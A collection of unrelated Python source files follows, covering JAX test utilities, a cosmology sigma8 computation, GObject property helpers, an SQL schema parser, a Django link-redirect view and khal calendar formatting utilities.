msg = "Unexpected precision: {} != {}".format(expected_precision, precision)
if isinstance(precision, tuple):
assert precision[0] == expected_precision, msg
assert precision[1] == expected_precision, msg
else:
assert precision == expected_precision, msg
_CACHED_INDICES: Dict[int, Sequence[int]] = {}
def cases_from_list(xs):
xs = list(xs)
n = len(xs)
k = min(n, FLAGS.num_generated_cases)
# Random sampling for every parameterized test is expensive. Do it once and
# cache the result.
indices = _CACHED_INDICES.get(n)
if indices is None:
rng = npr.RandomState(42)
_CACHED_INDICES[n] = indices = rng.permutation(n)
return [xs[i] for i in indices[:k]]
def cases_from_gens(*gens):
sizes = [1, 3, 10]
cases_per_size = int(FLAGS.num_generated_cases / len(sizes)) + 1
for size in sizes:
for i in range(cases_per_size):
yield ('_{}_{}'.format(size, i),) + tuple(gen(size) for gen in gens)
def named_cases_from_sampler(gen):
seen = set()
retries = 0
rng = npr.RandomState(42)
def choose_one(x):
if not isinstance(x, (list, tuple)):
x = list(x)
return [x[rng.randint(len(x))]]
while (len(seen) < FLAGS.num_generated_cases and
retries < FLAGS.max_cases_sampling_retries):
retries += 1
cases = list(gen(choose_one))
if not cases:
continue
if len(cases) > 1:
raise RuntimeError("Generator is expected to only return a single case when sampling")
case = cases[0]
if case["testcase_name"] in seen:
continue
retries = 0
seen.add(case["testcase_name"])
yield case
class JaxTestLoader(absltest.TestLoader):
def getTestCaseNames(self, testCaseClass):
names = super().getTestCaseNames(testCaseClass)
if FLAGS.test_targets:
pattern = re.compile(FLAGS.test_targets)
names = [name for name in names
if pattern.search(f"{testCaseClass.__name__}.{name}")]
if FLAGS.exclude_test_targets:
pattern = re.compile(FLAGS.exclude_test_targets)
names = [name for name in names
if not pattern.search(f"{testCaseClass.__name__}.{name}")]
return names
def with_config(**kwds):
"""Test case decorator for subclasses of JaxTestCase"""
def decorator(cls):
assert inspect.isclass(cls) and issubclass(cls, JaxTestCase), "@with_config can only wrap JaxTestCase class definitions."
cls._default_config = {**JaxTestCase._default_config, **kwds}
return cls
return decorator
class JaxTestCase(parameterized.TestCase):
"""Base class for JAX tests including numerical checks and boilerplate."""
_default_config = {
'jax_enable_checks': True,
'jax_numpy_rank_promotion': 'raise',
'jax_traceback_filtering': 'off',
}
# TODO(mattjj): this obscures the error messages from failures, figure out how
# to re-enable it
# def tearDown(self) -> None:
# assert core.reset_trace_state()
def setUp(self):
super().setUp()
self._original_config = {}
for key, value in self._default_config.items():
self._original_config[key] = config._read(key)
config.update(key, value)
# We use the adler32 hash for two reasons.
# a) it is deterministic run to run, unlike hash() which is randomized.
# b) it returns values in int32 range, which RandomState requires.
self._rng = npr.RandomState(zlib.adler32(self._testMethodName.encode()))
def tearDown(self):
for key, value in self._original_config.items():
config.update(key, value)
super().tearDown()
def rng(self):
return self._rng
def assertArraysEqual(self, x, y, *, check_dtypes=True, err_msg=''):
"""Assert that x and y arrays are exactly equal."""
if check_dtypes:
self.assertDtypesMatch(x, y)
# Work around https://github.com/numpy/numpy/issues/18992
with np.errstate(over='ignore'):
np.testing.assert_array_equal(x, y, err_msg=err_msg)
def assertArraysAllClose(self, x, y, *, check_dtypes=True, atol=None,
rtol=None, err_msg=''):
"""Assert that x and y are close (up to numerical tolerances)."""
self.assertEqual(x.shape, y.shape)
atol = max(tolerance(_dtype(x), atol), tolerance(_dtype(y), atol))
rtol = max(tolerance(_dtype(x), rtol), tolerance(_dtype(y), rtol))
_assert_numpy_allclose(x, y, atol=atol, rtol=rtol, err_msg=err_msg)
if check_dtypes:
self.assertDtypesMatch(x, y)
def assertDtypesMatch(self, x, y, *, canonicalize_dtypes=True):
if not config.x64_enabled and canonicalize_dtypes:
self.assertEqual(_dtypes.canonicalize_dtype(_dtype(x)),
_dtypes.canonicalize_dtype(_dtype(y)))
else:
self.assertEqual(_dtype(x), _dtype(y))
def assertAllClose(self, x, y, *, check_dtypes=True, atol=None, rtol=None,
canonicalize_dtypes=True, err_msg=''):
"""Assert that x and y, either arrays or nested tuples/lists, are close."""
if isinstance(x, dict):
self.assertIsInstance(y, dict)
self.assertEqual(set(x.keys()), set(y.keys()))
for k in x.keys():
self.assertAllClose(x[k], y[k], check_dtypes=check_dtypes, atol=atol,
rtol=rtol, canonicalize_dtypes=canonicalize_dtypes,
err_msg=err_msg)
elif is_sequence(x) and not hasattr(x, '__array__'):
self.assertTrue(is_sequence(y) and not hasattr(y, '__array__'))
self.assertEqual(len(x), len(y))
for x_elt, y_elt in zip(x, y):
self.assertAllClose(x_elt, y_elt, check_dtypes=check_dtypes, atol=atol,
rtol=rtol, canonicalize_dtypes=canonicalize_dtypes,
err_msg=err_msg)
elif hasattr(x, '__array__') or np.isscalar(x):
self.assertTrue(hasattr(y, '__array__') or np.isscalar(y))
if check_dtypes:
self.assertDtypesMatch(x, y, canonicalize_dtypes=canonicalize_dtypes)
x = np.asarray(x)
y = np.asarray(y)
self.assertArraysAllClose(x, y, check_dtypes=False, atol=atol, rtol=rtol,
err_msg=err_msg)
elif x == y:
return
else:
raise TypeError((type(x), type(y)))
def assertMultiLineStrippedEqual(self, expected, what):
"""Asserts two strings are equal, after dedenting and stripping each line."""
expected = textwrap.dedent(expected)
what = textwrap.dedent(what)
ignore_space_re = re.compile(r'\s*\n\s*')
expected_clean = re.sub(ignore_space_re, '\n', expected.strip())
what_clean = re.sub(ignore_space_re, '\n', what.strip())
if what_clean != expected_clean:
# Print it so we can copy-and-paste it into the test
print(f"Found\n{what}\n")
self.assertMultiLineEqual(expected_clean, what_clean,
msg="Found\n{}\nExpecting\n{}".format(what, expected))
def _CompileAndCheck(self, fun, args_maker, *, check_dtypes=True,
rtol=None, atol=None, check_cache_misses=True):
"""Helper method for running JAX compilation and allclose assertions."""
args = args_maker()
def wrapped_fun(*args):
self.assertTrue(python_should_be_executing)
return fun(*args)
python_should_be_executing = True
python_ans = fun(*args)
python_shapes = tree_map(lambda x: np.shape(x), python_ans)
np_shapes = tree_map(lambda x: np.shape(np.asarray(x)), python_ans)
self.assertEqual(python_shapes, np_shapes)
cache_misses = dispatch.xla_primitive_callable.cache_info().misses
python_ans = fun(*args)
if check_cache_misses:
self.assertEqual(
cache_misses, dispatch.xla_primitive_callable.cache_info().misses,
"Compilation detected during second call of {} in op-by-op "
"mode.".format(fun))
cfun = api.jit(wrapped_fun)
python_should_be_executing = True
monitored_ans = cfun(*args)
python_should_be_executing = False
compiled_ans = cfun(*args)
self.assertAllClose(python_ans, monitored_ans, check_dtypes=check_dtypes,
atol=atol, rtol=rtol)
self.assertAllClose(python_ans, compiled_ans, check_dtypes=check_dtypes,
atol=atol, rtol=rtol)
args = args_maker()
python_should_be_executing = True
python_ans = fun(*args)
python_should_be_executing = False
compiled_ans = cfun(*args)
self.assertAllClose(python_ans, compiled_ans, check_dtypes=check_dtypes,
atol=atol, rtol=rtol)
def _CheckAgainstNumpy(self, numpy_reference_op, lax_op, args_maker,
check_dtypes=True, tol=None, atol=None, rtol=None,
canonicalize_dtypes=True):
args = args_maker()
lax_ans = lax_op(*args)
numpy_ans = numpy_reference_op(*args)
self.assertAllClose(numpy_ans, lax_ans, check_dtypes=check_dtypes,
atol=atol or tol, rtol=rtol or tol,
canonicalize_dtypes=canonicalize_dtypes)
class BufferDonationTestCase(JaxTestCase):
assertDeleted = lambda self, x: self._assertDeleted(x, True)
assertNotDeleted = lambda self, x: self._assertDeleted(x, False)
def _assertDeleted(self, x, deleted):
if hasattr(x, "device_buffer"):
self.assertEqual(x.device_buffer.is_deleted(), deleted)
else:
for buffer in x.device_buffers:
self.assertEqual(buffer.is_deleted(), deleted)
@contextmanager
def ignore_warning(**kw):
with warnings.catch_warnings():
warnings.filterwarnings("ignore", **kw)
yield
# -------------------- Mesh parametrization helpers --------------------
MeshSpec = List[Tuple[str, int]]
@contextmanager
def with_mesh(named_shape: MeshSpec) -> Generator[None, None, None]:
"""Test utility for setting up meshes given mesh data from `schedules`."""
# This is similar to the `with_mesh` function above, but isn't a decorator.
axis_names, shape = unzip2(named_shape)
size = prod(shape)
local_devices = list(api.local_devices())
if len(local_devices) < size:
raise unittest.SkipTest(f"Test requires {size} local devices")
mesh_devices = np.array(local_devices[:size]).reshape(shape)
with Mesh(mesh_devices, axis_names):
yield
def with_mesh_from_kwargs(f):
return lambda *args, **kwargs: with_mesh(kwargs['mesh'])(f)(*args, **kwargs)
def with_and_without_mesh(f):
return parameterized.named_parameters(
{"testcase_name": name, "mesh": mesh, "axis_resources": axis_resources}
for name, mesh, axis_resources in (
('', (), ()),
('Mesh', (('x', 2),), (('i', 'x'),))
))(with_mesh_from_kwargs(f))
old_spmd_lowering_flag = None
def set_spmd_lowering_flag(val: bool):
global old_spmd_lowering_flag
old_spmd_lowering_flag = config.experimental_xmap_spmd_lowering
config.update('experimental_xmap_spmd_lowering', val)
def restore_spmd_lowering_flag():
if old_spmd_lowering_flag is None: return
config.update('experimental_xmap_spmd_lowering', old_spmd_lowering_flag)
old_spmd_manual_lowering_flag = None
def set_spmd_manual_lowering_flag(val: bool):
global old_spmd_manual_lowering_flag
old_spmd_manual_lowering_flag = config.experimental_xmap_spmd_lowering_manual
config.update('experimental_xmap_spmd_lowering_manual', val)
def restore_spmd_manual_lowering_flag():
if old_spmd_manual_lowering_flag is None: return
config.update('experimental_xmap_spmd_lowering_manual', old_spmd_manual_lowering_flag)
def create_global_mesh(mesh_shape, axis_names):
size = prod(mesh_shape)
if len(api.devices()) < size:
raise unittest.SkipTest(f"Test requires {size} global devices.")
devices = sorted(api.devices(), key=lambda d: d.id)
mesh_devices = np.array(devices[:size]).reshape(mesh_shape)
global_mesh = Mesh(mesh_devices, axis_names)
return global_mesh
class _cached_property:
null = object()
def __init__(self, method):
self._method = method
self._value = self.null
def __get__(self, obj, cls):
if self._value is self.null:
self._value = self._method(obj)
return self._value
class _LazyDtypes:
"""A class that unifies lists of supported dtypes.
These could be module-level constants, but device_under_test() is not always
known at import time, so we need to define these lists lazily.
"""
def supported(self, dtypes):
supported = supported_dtypes()
return type(dtypes)(d for d in dtypes if d in supported)
@_cached_property
def floating(self):
return self.supported([np.float32, np.float64])
@_cached_property
def all_floating(self):
return self.supported([_dtypes.bfloat16, np.float16, np.float32, np.float64])
@_cached_property
def integer(self):
return self.supported([np.int32, np.int64])
@_cached_property
def all_integer(self):
return self.supported([np.int8, np.int16, np.int32, np.int64])
@_cached_property
def unsigned(self):
return self.supported([np.uint32, np.uint64])
@_cached_property
def all_unsigned(self):
return self.supported([np.uint8, np.uint16, np.uint32, np.uint64])
@_cached_property
def complex(self):
return self.supported([np.complex64, np.complex128])
@_cached_property
def boolean(self):
return self.supported([np.bool_])
@_cached_property
def inexact(self):
return self.floating + self.complex
@_cached_property
def all_inexact(self):
return self.all_floating + self.complex
@_cached_property
def numeric(self):
return self.floating + self.integer + self.unsigned + self.complex
@_cached_property
def all(self):
return (self.all_floating + self.all_integer + self.all_unsigned +
self.complex + self.boolean)
dtypes = _LazyDtypes()
|
the-stack_106_22030
|
import numpy as np
from classy import Class
def compute_sigma8(pars, lnA0 = 3.047):
OmegaM, h= pars
omega_b = 0.02242
lnAs = lnA0
ns = 0.9665
nnu = 1
nur = 2.033
mnu = 0.06
omega_nu = 0.0106 * mnu
omega_c = (OmegaM - omega_b/h**2 - omega_nu/h**2) * h**2
pkparams = {
'output': 'mPk',
'P_k_max_h/Mpc': 20.,
'z_pk': '0.0,10',
'A_s': np.exp(lnAs)*1e-10,
'n_s': ns,
'h': h,
'N_ur': nur,
'N_ncdm': nnu,
'm_ncdm': mnu,
'tau_reio': 0.0568,
'omega_b': omega_b,
'omega_cdm': omega_c}
pkclass = Class()
pkclass.set(pkparams)
pkclass.compute()
sigma8 = pkclass.sigma8()
return sigma8
|
the-stack_106_22031
|
#!/usr/bin/env python
# -*- Mode: Python -*-
# vi:si:et:sw=4:sts=4:ts=4
#
# GStreamer python bindings
# Copyright (C) 2004 Johan Dahlin <johan at gnome dot org>
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
PyGTK helper functions
"""
import sys
import gobject
def gobject_set_property(object, property, value):
"""
Set the given property to the given value on the given object.
@type object: L{gobject.GObject}
@type property: string
@param value: value to set property to
"""
for pspec in gobject.list_properties(object):
if pspec.name == property:
break
else:
raise errors.PropertyError(
"Property '%s' in element '%s' does not exist" % (
property, object.get_property('name')))
if pspec.value_type in (gobject.TYPE_INT, gobject.TYPE_UINT,
gobject.TYPE_INT64, gobject.TYPE_UINT64):
try:
value = int(value)
except ValueError:
msg = "Invalid value given for property '%s' in element '%s'" % (
property, object.get_property('name'))
raise errors.PropertyError(msg)
elif pspec.value_type == gobject.TYPE_BOOLEAN:
if value == 'False':
value = False
elif value == 'True':
value = True
else:
value = bool(value)
elif pspec.value_type in (gobject.TYPE_DOUBLE, gobject.TYPE_FLOAT):
value = float(value)
elif pspec.value_type == gobject.TYPE_STRING:
value = str(value)
# FIXME: this is superevil ! we really need to find a better way
# of checking if this property is a param enum
# also, we only allow int for now
elif repr(pspec.__gtype__).startswith("<GType GParamEnum"):
value = int(value)
else:
raise errors.PropertyError('Unknown property type: %s' %
pspec.value_type)
object.set_property(property, value)
def gsignal(name, *args):
"""
Add a GObject signal to the current object.
To be used from class definition scope.
@type name: string
@type args: mixed
"""
frame = sys._getframe(1)
_locals = frame.f_locals
if not '__gsignals__' in _locals:
_dict = _locals['__gsignals__'] = {}
else:
_dict = _locals['__gsignals__']
_dict[name] = (gobject.SIGNAL_RUN_FIRST, None, args)
PARAM_CONSTRUCT = 1<<9
def with_construct_properties(__init__):
"""
Wrap a class' __init__ method in a procedure that will construct
gobject properties. This is necessary because pygtk's object
construction is a bit broken.
Usage::
class Foo(GObject):
def __init__(self):
GObject.__init(self)
__init__ = with_construct_properties(__init__)
"""
frame = sys._getframe(1)
_locals = frame.f_locals
gproperties = _locals['__gproperties__']
def hacked_init(self, *args, **kwargs):
__init__(self, *args, **kwargs)
self.__gproperty_values = {}
for p, v in gproperties.items():
if v[-1] & PARAM_CONSTRUCT:
self.set_property(p, v[3])
return hacked_init
def gproperty(type_, name, desc, *args, **kwargs):
"""
Add a GObject property to the current object.
To be used from class definition scope.
@type type_: type object
@type name: string
@type desc: string
@type args: mixed
"""
frame = sys._getframe(1)
_locals = frame.f_locals
flags = 0
def _do_get_property(self, prop):
try:
return self._gproperty_values[prop.name]
except (AttributeError, KeyError):
raise AttributeError('Property was never set', self, prop)
def _do_set_property(self, prop, value):
if not getattr(self, '_gproperty_values', None):
self._gproperty_values = {}
self._gproperty_values[prop.name] = value
_locals['do_get_property'] = _do_get_property
_locals['do_set_property'] = _do_set_property
if not '__gproperties__' in _locals:
_dict = _locals['__gproperties__'] = {}
else:
_dict = _locals['__gproperties__']
for i in 'readable', 'writable':
if not i in kwargs:
kwargs[i] = True
for k, v in kwargs.items():
if k == 'construct':
flags |= PARAM_CONSTRUCT
elif k == 'construct_only':
flags |= gobject.PARAM_CONSTRUCT_ONLY
elif k == 'readable':
flags |= gobject.PARAM_READABLE
elif k == 'writable':
flags |= gobject.PARAM_WRITABLE
elif k == 'lax_validation':
flags |= gobject.PARAM_LAX_VALIDATION
else:
raise Exception('Invalid GObject property flag: %r=%r' % (k, v))
_dict[name] = (type_, name, desc) + args + tuple((flags,))
|
the-stack_106_22032
|
# Copyright (C) 2013 Lukas Lalinsky
# Distributed under the MIT license, see the LICENSE file for details.
import re
import sqlparse
from sqlparse import tokens as T
from sqlparse.sql import Token, TokenList, Parenthesis, Statement
def group_parentheses(tokens):
stack = [[]]
for token in tokens:
if token.is_whitespace:
continue
if token.match(T.Punctuation, '('):
stack.append([token])
else:
stack[-1].append(token)
if token.match(T.Punctuation, ')'):
group = stack.pop()
stack[-1].append(Parenthesis(group))
return TokenList(stack[0])
class Set(Statement):
def get_name(self):
idx, set_token = self.token_next_by(m=(T.Keyword, 'SET'))
if set_token is None:
raise ValueError('unknown format - missing SET')
idx, token = self.token_next(idx)
if token is None:
raise ValueError('unknown format - missing SET name')
return token.value
def _find_value(self):
idx, comparison = self.token_next_by(m=(T.Comparison, '='))
if comparison is None:
idx, comparison = self.token_next_by(m=(T.Keyword, 'TO'))
if comparison is None:
raise ValueError('unknown format')
return idx, comparison
def get_value(self):
idx, token = self.token_next(self._find_value()[0])
if token is None or token.match(T.Punctuation, ';'):
return None
if token.ttype == T.String.Single:
return token.value[1:-1]
if token.ttype == T.Name:
return token.value
raise ValueError('unknown format')
class CreateTable(Statement):
def __init__(self, tokens):
Statement.__init__(self, tokens)
self._group_columns()
def _group_columns(self):
idx, body_token = self.token_next_by(Parenthesis)
if body_token is None:
raise ValueError('unknown format - missing TABLE body')
start = 1
end = len(body_token.tokens) - 1
groups = []
while start < end:
group_start = start
while group_start <= end and body_token.tokens[group_start].value.startswith('--'):
group_start += 1
group_end = group_start
while group_end < end:
group_end += 1
if body_token.tokens[group_end].match(T.Punctuation, ','):
break
while group_end < end:
group_end += 1
if not body_token.tokens[group_end].value.startswith('--'):
break
start = group_end
if body_token.tokens[group_start].value not in ('CONSTRAINT', 'CHECK'):
groups.insert(0, (group_start, group_end))
for group_start, group_end in groups:
body_token.group_tokens(CreateTableColumn, group_start, group_end, include_end=0)
def get_name(self):
idx, table_token = self.token_next_by(m=(T.Keyword, 'TABLE'))
if table_token is None:
raise ValueError('unknown format - missing TABLE')
idx, token = self.token_next(idx)
if token is None:
raise ValueError('unknown format - missing TABLE name')
return token.value
def get_columns(self):
for token in self.tokens:
if isinstance(token, Parenthesis):
for sub_token in token.tokens:
if isinstance(sub_token, CreateTableColumn):
yield sub_token
class CreateTableColumnCheckConstraint(TokenList):
def get_name(self):
idx, constraint_token = self.token_next_by(m=(T.Keyword, 'CONSTRAINT'))
if constraint_token is not None:
idx, name_token = self.token_next(idx)
if name_token is not None:
return name_token.value
def _get_body_tokens(self):
idx, body_token = self.token_next_by(i=Parenthesis)
if body_token is not None:
return TokenList(body_token.tokens[1:-1])
def get_body(self):
tokens = []
for token in self._get_body_tokens().flatten():
if token.is_whitespace:
continue
if token.ttype == T.Comment.Single:
continue
# if tokens and not tokens[-1].match(T.Punctuation, '(') and not token.match(T.Punctuation, ')') and not tokens[-1].value == 'E':
# tokens.append(Token(T.Whitespace, ' '))
tokens.append(token)
return group_parentheses(tokens)
class CreateTableColumn(TokenList):
def get_name(self):
name_token = self.token_first()
return name_token.value
def get_type(self):
idx, name_token = self.token_next(-1)
idx, token = self.token_next(idx)
type = token.value
idx, token = self.token_next(idx)
if token and isinstance(token, Parenthesis):
type += token.value
idx, token = self.token_next(idx)
if token and token.normalized == 'WITH':
idx2, t = self.token_next(idx)
if t and t.normalized == 'TIME':
idx2, t = self.token_next(idx2)
if t and t.normalized == 'ZONE':
type += ' WITH TIME ZONE'
idx2, token = self.token_next(idx2)
if token and token.normalized == 'WITHOUT':
idx2, t = self.token_next(idx)
if t and t.normalized == 'TIME':
idx2, t = self.token_next(idx2)
if t and t.normalized == 'ZONE':
type += ' WITHOUT TIME ZONE'
idx2, token = self.token_next(idx2)
return type
def get_default_value(self):
idx, token = self.token_next_by(m=(T.Keyword, 'DEFAULT'))
if token is None:
return None
idx, token = self.token_next(idx)
default = token.value
idx, token = self.token_next(idx)
if token and isinstance(token, Parenthesis):
default += token.value
idx, token = self.token_next(idx)
return default
def get_comments(self):
comments = []
idx, token = self.token_next_by(t=T.Comment.Single)
while token is not None:
comments.append(token.value.strip())
idx += 1
idx, token = self.token_next_by(t=T.Comment.Single, idx=idx)
return comments
def is_not_null(self):
idx, token = self.token_next_by(m=(T.Keyword, 'NOT NULL'))
if token is None:
return False
return True
def get_check_constraint(self):
idx, check_token = self.token_next_by(m=(T.Keyword, 'CHECK'))
if check_token is None:
return None
tokens = []
idx2, constraint_name_token = self.token_prev(idx)
if constraint_name_token is not None:
idx2, constraint_token = self.token_prev(idx2)
if constraint_token is not None and constraint_token.normalized == 'CONSTRAINT':
tokens.append(constraint_token)
tokens.append(constraint_name_token)
tokens.append(check_token)
idx, body_token = self.token_next(idx)
tokens.append(body_token)
return CreateTableColumnCheckConstraint(tokens)
class CreateType(Statement):
def get_name(self):
idx, token = self.token_next_by(t=T.Name)
if token is None:
raise ValueError('unknown format')
return token.value
def get_enum_labels(self):
idx, enum_token = self.token_next_by(m=(T.Name, 'ENUM'))
if enum_token is None:
raise ValueError('unknown format - missing ENUM')
idx, parentheses_tokens = self.token_next(idx)
if parentheses_tokens is None or not isinstance(parentheses_tokens, Parenthesis):
raise ValueError('unknown format - missing parentheses after ENUM')
labels = []
for token in parentheses_tokens.tokens:
if token.ttype == T.String.Single:
labels.append(token.value[1:-1])
return labels
class CreateIndex(Statement):
def get_name(self):
idx, token = self.token_next_by(m=(T.Keyword, 'INDEX'))
if token is None:
raise ValueError('unknown format - missing INDEX')
idx, token = self.token_next(idx)
if token is None:
raise ValueError('unknown format')
return token.value
def is_unique(self):
idx, token = self.token_next_by(m=(T.Keyword, 'INDEX'))
if token is None:
raise ValueError('unknown format - missing INDEX')
idx, token = self.token_prev(idx)
if token is None:
raise ValueError('unknown format')
return token.normalized == 'UNIQUE'
def get_table(self):
idx, token = self.token_next_by(m=(T.Keyword, 'ON'))
if token is None:
raise ValueError('unknown format - missing ON')
idx, token = self.token_next(idx)
if token is None:
raise ValueError('unknown format')
return token.value
def get_columns(self):
idx, parens_token = self.token_next_by(i=Parenthesis)
if parens_token is None:
raise ValueError('unknown format - missing ON')
columns = []
for token in parens_token.tokens:
if token.ttype != T.Punctuation:
columns.append(token.value)
return columns
def parse_statements(statements):
for statement in statements:
clean_tokens = group_parentheses(statement.flatten())
idx, token = statement.token_next(-1)
if token is None:
continue
if token.normalized == 'SET':
statement = Set(clean_tokens.tokens)
elif token.normalized == 'CREATE':
idx, token = statement.token_next(idx)
if token is not None:
if token.normalized == 'TABLE':
statement = CreateTable(clean_tokens.tokens)
elif token.normalized == 'TYPE':
statement = CreateType(clean_tokens.tokens)
elif token.normalized == 'INDEX':
statement = CreateIndex(clean_tokens.tokens)
elif token.normalized == 'UNIQUE':
idx, token = statement.token_next(idx)
if token is not None:
if token.normalized == 'INDEX':
statement = CreateIndex(clean_tokens.tokens)
yield statement
|
the-stack_106_22036
|
from django.conf import settings
from django.http import HttpResponse
from django.views.generic import DetailView
from core import tasks
from core.models import Link
from core.utils import get_client_ip
class LinkDetailView(DetailView):
model = Link
def get_queryset(self):
qs = super().get_queryset()
return qs.filter(
is_active=True,
company=self.request.company
)
def get(self, request, *args, **kwargs):
obj = self.get_object()
ip = get_client_ip(request)
task = tasks.link_task
if not settings.DEBUG:
task = task.delay
task(
company_id=obj.company.id,
task='visit_create',
pk=obj.pk,
data={'ip_address': ip}
)
response = HttpResponse("", status=301)
response['Location'] = obj.destination
return response
|
the-stack_106_22037
|
# Copyright (c) 2013-2021 khal contributors
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""collection of utility functions"""
import datetime as dt
import pytz
import random
import re
import string
import json
from calendar import month_abbr, timegm
from textwrap import wrap
from click import style
from .terminal import get_color
from typing import Iterator, List, Tuple, Optional
def generate_random_uid() -> str:
"""generate a random uid
when random isn't broken, getting a random UID from a pool of roughly 10^56
should be good enough"""
choice = string.ascii_uppercase + string.digits
return ''.join([random.choice(choice) for _ in range(36)])
RESET = '\x1b[0m'
ansi_reset = re.compile(r'\x1b\[0m')
ansi_sgr = re.compile(r'\x1b\['
'(?!0m)' # negative lookahead, don't match 0m
'([0-9]+;?)+'
'm')
def find_last_reset(string: str) -> Tuple[int, int, str]:
for match in re.finditer(ansi_reset, string): # noqa B007: this is actually used below.
pass
try:
return match.start(), match.end(), match.group(0)
except UnboundLocalError:
return -2, -1, ''
def find_last_sgr(string: str) -> Tuple[int, int, str]:
for match in re.finditer(ansi_sgr, string): # noqa B007: this is actually used below.
pass
try:
return match.start(), match.end(), match.group(0)
except UnboundLocalError:
return -2, -1, ''
def find_unmatched_sgr(string: str) -> Optional[str]:
reset_pos, _, _ = find_last_reset(string)
sgr_pos, _, sgr = find_last_sgr(string)
if sgr_pos > reset_pos:
return sgr
else:
return None
def color_wrap(text: str, width: int = 70) -> List[str]:
"""A variant of wrap that takes SGR codes (somewhat) into account.
This doesn't actually adjust the length, but makes sure that
lines that enable some attribues also contain a RESET, and also adds
that code to the next line
"""
# TODO we really want to ignore all SGR codes when measuring the width
lines = wrap(text, width)
for num, _ in enumerate(lines):
sgr = find_unmatched_sgr(lines[num])
if sgr is not None:
lines[num] += RESET
if (num + 1) < len(lines):
lines[num + 1] = sgr + lines[num + 1]
return lines
def get_weekday_occurrence(day: dt.date) -> Tuple[int, int]:
"""Calculate how often this weekday has already occurred in a given month.
:returns: weekday (0=Monday, ..., 6=Sunday), occurrence
"""
xthday = 1 + (day.day - 1) // 7
return day.weekday(), xthday
def get_month_abbr_len() -> int:
"""Calculate the number of characters we need to display the month
abbreviated name. It depends on the locale.
"""
return max(len(month_abbr[i]) for i in range(1, 13)) + 1
def localize_strip_tz(dates: List[dt.datetime], timezone: dt.tzinfo) -> Iterator[dt.datetime]:
"""converts a list of dates to timezone, than removes tz info"""
for one_date in dates:
if getattr(one_date, 'tzinfo', None) is not None:
one_date = one_date.astimezone(timezone)
one_date = one_date.replace(tzinfo=None)
yield one_date
def to_unix_time(dtime: dt.datetime) -> float:
"""convert a datetime object to unix time in UTC (as a float)"""
if getattr(dtime, 'tzinfo', None) is not None:
dtime = dtime.astimezone(pytz.UTC)
unix_time = timegm(dtime.timetuple())
return unix_time
def to_naive_utc(dtime: dt.datetime) -> dt.datetime:
"""convert a datetime object to UTC and than remove the tzinfo, if
datetime is naive already, return it
"""
if not hasattr(dtime, 'tzinfo') or dtime.tzinfo is None:
return dtime
dtime_utc = dtime.astimezone(pytz.UTC)
dtime_naive = dtime_utc.replace(tzinfo=None)
return dtime_naive
def is_aware(dtime: dt.datetime) -> bool:
"""test if a datetime instance is timezone aware"""
if dtime.tzinfo is not None and dtime.tzinfo.utcoffset(dtime) is not None:
return True
else:
return False
def relative_timedelta_str(day: dt.date) -> str:
"""Converts the timespan from `day` to today into a human readable string.
"""
days = (day - dt.date.today()).days
if days < 0:
direction = 'ago'
else:
direction = 'from now'
approx = ''
if abs(days) < 7:
unit = 'day'
count = abs(days)
elif abs(days) < 365:
unit = 'week'
count = int(abs(days) / 7)
if abs(days) % 7 != 0:
approx = '~'
else:
unit = 'year'
count = int(abs(days) / 365)
if abs(days) % 365 != 0:
approx = '~'
if count > 1:
unit += 's'
return '{approx}{count} {unit} {direction}'.format(
approx=approx,
count=count,
unit=unit,
direction=direction,
)
def get_wrapped_text(widget):
return widget.original_widget.get_edit_text()
def human_formatter(format_string, width=None, colors=True):
"""Create a formatter that formats events to be human readable."""
def fmt(rows):
single = type(rows) == dict
if single:
rows = [rows]
results = []
for row in rows:
if 'calendar-color' in row:
row['calendar-color'] = get_color(row['calendar-color'])
s = format_string.format(**row)
if colors:
s += style('', reset=True)
if width:
results += color_wrap(s, width)
else:
results.append(s)
if single:
return results[0]
else:
return results
return fmt
CONTENT_ATTRIBUTES = ['start', 'start-long', 'start-date', 'start-date-long',
'start-time', 'end', 'end-long', 'end-date', 'end-date-long', 'end-time',
'duration', 'start-full', 'start-long-full', 'start-date-full',
'start-date-long-full', 'start-time-full', 'end-full', 'end-long-full',
'end-date-full', 'end-date-long-full', 'end-time-full', 'duration-full',
'start-style', 'end-style', 'to-style', 'start-end-time-style',
'end-necessary', 'end-necessary-long', 'repeat-symbol', 'repeat-pattern',
'title', 'organizer', 'description', 'location', 'all-day', 'categories',
'uid', 'url', 'calendar', 'calendar-color', 'status', 'cancelled']
def json_formatter(fields):
"""Create a formatter that formats events in JSON."""
if len(fields) == 1 and fields[0] == 'all':
fields = CONTENT_ATTRIBUTES
def fmt(rows):
single = type(rows) == dict
if single:
rows = [rows]
filtered = []
for row in rows:
f = dict(filter(lambda e: e[0] in fields and e[0] in CONTENT_ATTRIBUTES, row.items()))
if f.get('repeat-symbol', '') != '':
f["repeat-symbol"] = f["repeat-symbol"].strip()
if f.get('status', '') != '':
f["status"] = f["status"].strip()
if f.get('cancelled', '') != '':
f["cancelled"] = f["cancelled"].strip()
filtered.append(f)
results = [json.dumps(filtered, ensure_ascii=False)]
if single:
return results[0]
else:
return results
return fmt
|
the-stack_106_22038
|
# Helper Functions
# Imports
import requests, json, os
# Credentials
